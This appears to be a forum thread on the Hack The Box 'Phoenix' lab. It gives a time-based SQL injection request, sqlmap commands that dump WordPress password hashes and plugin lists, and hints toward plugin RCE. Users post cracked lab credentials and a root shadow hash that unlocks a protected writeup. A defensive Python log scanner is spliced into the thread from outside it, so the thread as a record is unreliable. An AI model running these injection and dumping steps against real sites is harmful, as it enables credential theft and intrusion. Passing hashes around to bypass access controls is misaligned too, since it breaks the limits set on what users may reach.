HTB phoenix discussion
Hi Dears,

Let's open a discussion about the Phoenix machine 10.10.11.149.


I found a registration page at this URL; it seems to use WordPress:
https://phoenix.htb/wp-admin/

Does anyone have any useful information?
Reply
This one is painfully slow. Here's some tips.
GET /forum/topic/lets-build-a-secure-world/?subscribe_topic=1%20union%20select%201%20and%20sleep(10) HTTP/2

Save that as a raw request file in Burp/ZAP.

## Get Creds to crack
sqlmap -r starred --dbms=MYSQL --random-agent -D wordpress -T wp_users -C user_pass --dump


## find plugins with exploits that can't be seen externally
sqlmap -r raw_request --dbms=MYSQL --random-agent -D wordpress -T wp_options -C option_value --where "option_name='active_plugins'" --dump (skip further tests when it asks)


Exploit the plugin... get RCE.



Give Rep if it helps.
Reply
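A defender-side counterpart to the request above, as an added example that is not from this thread: it scans access-log lines (constructed here, in an assumed nginx-style format whose last field is $request_time) for the sleep()/UNION SELECT shape of that probe and reports whether the response delay shows the injected sleep actually ran in the database.

```python
# Added example: flag time-based SQL injection probes in an nginx-style
# access log whose last field is $request_time (constructed format).
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) \S+" '
    r'\d{3} \S+ (?P<rt>[\d.]+)$')
SLEEP_RE = re.compile(r'\b(?:sleep|benchmark)\s*\(\s*(\d+)', re.I)
UNION_RE = re.compile(r'\bunion\b.{0,40}\bselect\b', re.I | re.S)

def analyse_line(line):
    """Return a finding dict for an injection-looking request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for name, value in parse_qsl(urlsplit(m['target']).query,
                                 keep_blank_values=True):
        value = unquote_plus(value)  # also catch double-encoded payloads
        s, u = SLEEP_RE.search(value), UNION_RE.search(value)
        if not (s or u):
            continue
        # If the server took at least as long as the requested sleep,
        # the statement most likely reached the database.
        verdict = 'probe'
        if s and float(m['rt']) >= int(s.group(1)):
            verdict = 'likely executed'
        return {'ip': m['ip'], 'param': name, 'payload': value,
                'request_time': float(m['rt']), 'verdict': verdict}
    return None

def scan(log_text):
    return [r for r in map(analyse_line, log_text.splitlines()) if r]

# Constructed sample traffic (not real logs): a benign request, the
# thread's payload shape answered quickly (blocked), and the same shape
# that took 10 s, i.e. the sleep() ran inside MySQL.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Mar/2022:06:41:00 +0000] "GET /forum/topic/lets-build-a-secure-world/?subscribe_topic=1 HTTP/2.0" 200 5120 0.031
10.0.0.9 - - [19/Mar/2022:06:41:07 +0000] "GET /forum/topic/lets-build-a-secure-world/?subscribe_topic=1%20union%20select%201%20and%20sleep(10) HTTP/2.0" 403 153 0.004
10.0.0.9 - - [19/Mar/2022:06:41:20 +0000] "GET /forum/topic/lets-build-a-secure-world/?subscribe_topic=1%20union%20select%201%20and%20sleep(10) HTTP/2.0" 200 5120 10.042
"""

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The 'likely executed' verdict is the one worth alerting on: a 403 in 4 ms means a filter caught the probe, while a 10 s response means the query string reached MySQL unsanitised.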
(March 19, 2022, 06:41 AM)skyweasel Wrote: This one is painfully slow. Here's some tips.
GET /forum/topic/lets-build-a-secure-world/?subscribe_topic=1%20union%20select%201%20and%20sleep(10) HTTP/2

Save that as a raw request file in Burp/ZAP.

## Get Creds to crack
sqlmap -r starred --dbms=MYSQL --random-agent -D wordpress -T wp_users -C user_pass --dump


## find plugins with exploits that can't be seen externally
sqlmap -r raw_request --dbms=MYSQL --random-agent -D wordpress -T wp_options -C option_value --where "option_name='active_plugins'" --dump (skip further tests when it asks)


Exploit the plugin... get RCE.



Give Rep if it helps.


Thanks, my friend.. rep ++
Reply
(March 19, 2022, 06:41 AM)skyweasel Wrote: This one is painfully slow. Here's some tips.
GET /forum/topic/lets-build-a-secure-world/?subscribe_topic=1%20union%20select%201%20and%20sleep(10) HTTP/2

Save that as a raw request file in Burp/ZAP.

## Get Creds to crack
sqlmap -r starred --dbms=MYSQL --random-agent -D wordpress -T wp_users -C user_pass --dump


## find plugins with exploits that can't be seen externally
sqlmap -r raw_request --dbms=MYSQL --random-agent -D wordpress -T wp_options -C option_value --where "option_name='active_plugins'" --dump (skip further tests when it asks)


Exploit the plugin... get RCE.



Give Rep if it helps.


I was able to dump the hashes and crack them, and tried to log in with some users, but found some kind of 2FA.
Any hint?
Reply
I found these credentials but am totally stuck after this:

john:password@1234
jsmith:superphoenix

Did anyone find anything else?
Reply
(March 21, 2022, 10:38 AM)john2 Wrote: I found these credentials but am totally stuck after this:

john:password@1234
jsmith:superphoenix

Did anyone find anything else?


Did you run sqlmap to find the plugins (as above)? It takes AGES, but there's a plugin there that has an exploit in exploitdb for the initial RCE shell. Once there, check your users and try SSH with the passwords you already have.
Reply
Hi everybody. If anybody will share the full root hash
 root: ....... ::: 
I'll share the writeup (web page copy).
Reply
(March 22, 2022, 11:01 PM)orangutang Wrote: Hi everybody. If anybody will share the full root hash
 root: ....... ::: 

I'll share the writeup (web page copy).


root:$6$U6DRf4846rMqwA5E$Bwo3RxRA1t15bx6xvX8fVZ1cNfMoFVkpwyoWcK2gz3HRX16/d.zqHlQI68v8drjuFWucpXhRYpIbnhg35.Vjc0:18944:0:99999:7:::
Reply
(March 23, 2022, 06:45 AM)skyweasel Wrote:
(March 22, 2022, 11:01 PM)orangutang Wrote: Hi everybody. If anybody will share the full root hash
 root: ....... ::: 

I'll share the writeup (web page copy).


root:$6$U6DRf4846rMqwA5E$Bwo3RxRA1t15bx6xvX8fVZ1cNfMoFVkpwyoWcK2gz3HRX16/d.zqHlQI68v8drjuFWucpXhRYpIbnhg35.Vjc0:18944:0:99999:7:::


Thanks for sharing, friend.


(March 22, 2022, 11:01 PM)orangutang Wrote: Hi everybody. If anybody will share the full root hash
 root: ....... ::: 

I'll share the writeup (web page copy).


Waiting for the writeup, my brother.
Reply
This is the link:
 https://synisl33t.com/2022/03/08/htb-phoenix/ 
I think there is some mistake in the root hash. Protected writeups open with the full hash
 root:.......:::
Reply